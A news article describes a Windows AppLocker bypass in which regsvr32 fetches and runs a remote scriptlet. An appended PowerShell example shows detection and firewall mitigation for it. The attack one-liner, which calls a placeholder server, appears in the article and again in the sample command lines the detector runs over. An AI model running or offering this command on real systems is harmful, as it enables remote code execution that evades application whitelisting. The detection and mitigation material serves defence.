A security researcher has found a vulnerability in Windows that could allow hackers to install malicious software on a computer without the user’s knowledge. Casey Smith, a researcher from Colorado, discovered that regsvr32 (regsvr64 in 64-bit versions) – a whitelisted Windows binary, dating back to Windows 7 – can be manipulated to bypass the AppLocker security restrictions on installing programs.
“So, I have been working this out the last few days. I was trying to solve a particular problem,” Smith wrote on his blog. “I needed a reverse shell on a workstation locked down by AppLocker with executable and script rules enforced.”
Smith’s solution to the problem looked like this:
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
Effectively, he pointed regsvr32 at a URL as its script source, a feature of regsvr32 that was not widely known to exist.
“The amazing thing here is that regsvr32 is already proxy aware, uses TLS, follows redirects, etc… And… You guessed it, a signed, default MS binary. So, all you need to do is host your .sct file at a location you control,” added Smith.
The crux of Smith’s discovery is that, by using regsvr32, someone can remotely execute code on a Windows machine without triggering AppLocker. While Microsoft is yet to patch the flaw, anyone concerned about it can block regsvr32 in either Windows Firewall or their own third-party firewall.
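The following PowerShell is an added example written for this page; it is not code from the article or from Casey Smith’s blog. It does two things a defender would want given the command line quoted above: a small check that flags process command lines matching the regsvr32 /i:&lt;URL&gt; scrobj.dll pattern (run here over constructed sample command lines, not real telemetry), and the firewall mitigation the article mentions, implemented with New-NetFirewallRule for both the System32 and SysWOW64 copies of regsvr32.exe. The function name Test-SuspiciousRegsvr32 and the sample strings are assumptions of this example; the firewall part assumes Windows 10 / Server 2016 or later and an elevated prompt.

```powershell
# Added example, not from the article or Casey Smith's blog.
# Assumes: NetSecurity module (Windows 10 / Server 2016+), elevated prompt for the firewall part.

function Test-SuspiciousRegsvr32 {
    param([Parameter(Mandatory)][string]$CommandLine)
    # True when regsvr32 is invoked with /i: pointing at an http(s) URL or with scrobj.dll,
    # which is the scriptlet-from-URL pattern described in the article.
    $isRegsvr   = $CommandLine -match '(?i)(^|[\\\s"])regsvr32(\.exe)?("|\s)'
    $urlInstall = $CommandLine -match '(?i)/i:\s*"?https?://'
    $scrobj     = $CommandLine -match '(?i)scrobj\.dll'
    return [bool]($isRegsvr -and ($urlInstall -or $scrobj))
}

# Constructed sample process-creation command lines (not real logs).
$samples = @(
    'regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll',                  # the command from the article
    '"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files\Vendor\plugin.dll"', # ordinary local DLL registration
    'C:\Windows\SysWOW64\regsvr32.exe /s /i:https://example.invalid/x.sct scrobj.dll',
    'notepad.exe C:\temp\file.sct'
)
foreach ($cmd in $samples) {
    $verdict = if (Test-SuspiciousRegsvr32 -CommandLine $cmd) { 'SUSPICIOUS' } else { 'ok' }
    '{0,-10} {1}' -f $verdict, $cmd
}

# Mitigation from the article: block outbound network access for regsvr32.exe in
# Windows Firewall. Both the 64-bit (System32) and 32-bit (SysWOW64) copies are covered.
$regsvrPaths = @(
    "$env:SystemRoot\System32\regsvr32.exe",
    "$env:SystemRoot\SysWOW64\regsvr32.exe"
)
foreach ($path in $regsvrPaths) {
    if (Test-Path $path) {
        New-NetFirewallRule -DisplayName "Block outbound regsvr32 ($path)" `
            -Direction Outbound -Program $path -Action Block -Profile Any -Enabled True | Out-Null
    }
}
```

The firewall rule only addresses the remote-fetch variant the article describes; a scriptlet already present on disk is not stopped by it, which is why the command-line check also matches on scrobj.dll rather than only on a URL. Ordinary local DLL registration (the second sample) is not flagged.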